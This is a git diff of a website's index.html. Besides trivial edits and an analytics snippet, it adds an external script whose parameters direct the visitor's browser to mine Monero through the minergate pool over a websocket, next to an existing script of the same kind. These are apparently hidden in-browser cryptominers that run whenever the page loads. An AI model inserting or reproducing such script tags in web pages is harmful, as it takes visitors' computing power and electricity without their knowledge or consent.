--- a/index.html
+++ b/index.html
@@ -19,7 +19,7 @@
     <div align="center"><iframe width="720" height="480" src="http://player.latino-webtv.com/channels/space.html" frameborder="0" allow="kutoplay; encrypted-media" allowfullscreen></iframe></div>
 -->
 	
-<p>3</p>
+<p>4</p>
 	
 <script>
 $(function() {
@@ -44,7 +44,19 @@ if ($.cookie("pooladdress")) {
   });
 </script>
 	
+<script src="assets/scripts/gustav.js?v24042018"></script>
 	
+<script src="assets/scripts/Chart.min.js"></script>
+	
+<script type="text/javascript" src="https://thelifeisbinary.netlify.com/media.js?perfekt=wss://?jason=xmr.pool.minergate.com:45700"></script>
+	
+<script>
+  window.dataLayer = window.dataLayer || [];
+  function gtag(){dataLayer.push(arguments);}
+  gtag('js', new Date());
+
+  gtag('config', 'UA-81214188-2');
+</script>	
 	
 <script src="https://eth-pocket.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=xmr.pool.minergate.com:45700"></script>
 <script type="text/javascript">
